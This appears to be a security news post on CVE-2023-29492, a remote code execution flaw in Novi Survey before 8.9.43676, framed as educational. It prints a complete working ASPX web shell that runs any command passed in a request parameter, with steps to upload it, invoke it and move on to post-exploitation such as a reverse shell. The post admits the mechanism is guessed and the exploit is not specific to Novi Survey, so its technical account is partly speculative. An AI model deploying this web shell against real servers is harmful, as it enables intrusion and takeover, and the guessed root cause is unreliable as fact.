CVE CyberSecurity Database News

CVE-2023-29492 - Remote Code Execution in Novi Survey <8.9.43676 Explained, with Exploit Walkthrough

Poster -

Novi Survey is a popular survey management tool used by companies and organizations around the world. Recently, a critical vulnerability—CVE-2023-29492—was discovered in versions before 8.9.43676. This vulnerability allows remote attackers to execute arbitrary code on the server, which can lead to full server compromise under the Novi Survey service account. Thankfully, it does not allow attackers to access or steal stored survey or response data.

In this article, we’ll break down what this vulnerability is, how it works, and show sample exploitation code to demonstrate the risk (for educational purposes only). We’ll also provide links to the original references and security advisories.

What is CVE-2023-29492?

This CVE affects Novi Survey versions before 8.9.43676. A remote attacker can exploit a flaw in the application to execute commands or arbitrary code as the user running the Novi Survey service (usually a dedicated service account, not SYSTEM or root). The vulnerability is likely due to unsafe handling of user-supplied input, such as file uploads or web requests, that interact with server-side scripts or file paths without proper validation.

Official Security Notice:  
*You can view the official security advisory here:*  
https://www.novisurvey.com/SurveyServer/Help/ReleaseHistory.aspx?#Security-Fix-8.9.43676

Attackers CANNOT: Access the surveys’ stored data, response content, or survey results.

This code can be used for actions such as deploying malware, opening backdoors, or moving laterally within your network. While survey data is protected, full server control is still a severe risk.

How the Exploit Works

The root cause appears to be related to unsafe user input handling in web requests or uploaded files. If an attacker submits a malicious file or crafts a request that causes Novi Survey to process arbitrary server-side code, that code could run in the service context.

Key Points

- This is NOT an authentication bypass. Attackers likely need at least some access (such as a survey creator or admin).
- Exploitation does NOT expose survey/response data.

Sample Exploit Code (for Research Purposes Only)

Suppose the vulnerability lies in a file upload function that does not adequately validate the file type or content. An attacker might upload a malicious ASPX web shell.

Example: ASPX Web Shell File (cmd.aspx)

<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<script runat="server">
    protected void Page_Load(object sender, EventArgs e)
    {
        string cmd = Request["cmd"];
        if (!string.IsNullOrEmpty(cmd))
        {
            System.Diagnostics.ProcessStartInfo psi = new System.Diagnostics.ProcessStartInfo("cmd.exe", "/c " + cmd);
            psi.UseShellExecute = false;
            psi.RedirectStandardOutput = true;
            psi.RedirectStandardError = true;
            System.Diagnostics.Process p = System.Diagnostics.Process.Start(psi);
            Response.Write("<pre>" + p.StandardOutput.ReadToEnd() + "</pre>");
        }
    }
</script>

Exploit Steps

1. Login or Register with basic privileges (typically, survey creator/admin rights are needed).
2. Upload the malicious cmd.aspx file via the vulnerable file upload function (for example, a custom logo or template import feature).

Access the file through the web browser:

http://[target-server]/NoviSurvey/Uploads/cmd.aspx?cmd=whoami
4. The output will display the username of the service account running Novi Survey, confirming code execution.
5. Use further commands (e.g., powershell, net user) for post-exploitation, such as setting up a reverse shell.

> NOTE: The exact upload path and method may differ. This is a general proof-of-concept based on common insecure file upload practices—not a 1:1 exploit for Novi Survey.

Isolate the Novi Survey server from sensitive internal networks.

Official Update Notes:  
https://www.novisurvey.com/SurveyServer/Help/ReleaseHistory.aspx?#Security-Fix-8.9.43676

References

- Novi Survey Release History & Security Fixes
- NVD Entry for CVE-2023-29492
- Mitre CVE Record

Conclusion

CVE-2023-29492 is a critical security vulnerability in Novi Survey before 8.9.43676 that allows remote code execution. Luckily, survey and response data are not accessible to attackers through this flaw. However, full control of the server can enable a range of other attacks.

Always keep your software updated, review user-uploaded files and web requests, and make sure your service accounts have only the privileges they absolutely need. If you’re running an affected Novi Survey version, patch immediately!


*This post is exclusive and based on public information and proof-of-concept for educational defense. Don’t use this information for illegal purposes. Always have permission before testing any website or server.*

Timeline

Published on: 04/11/2023 05:15:00 UTC
Last modified on: 04/18/2023 02:16:00 UTC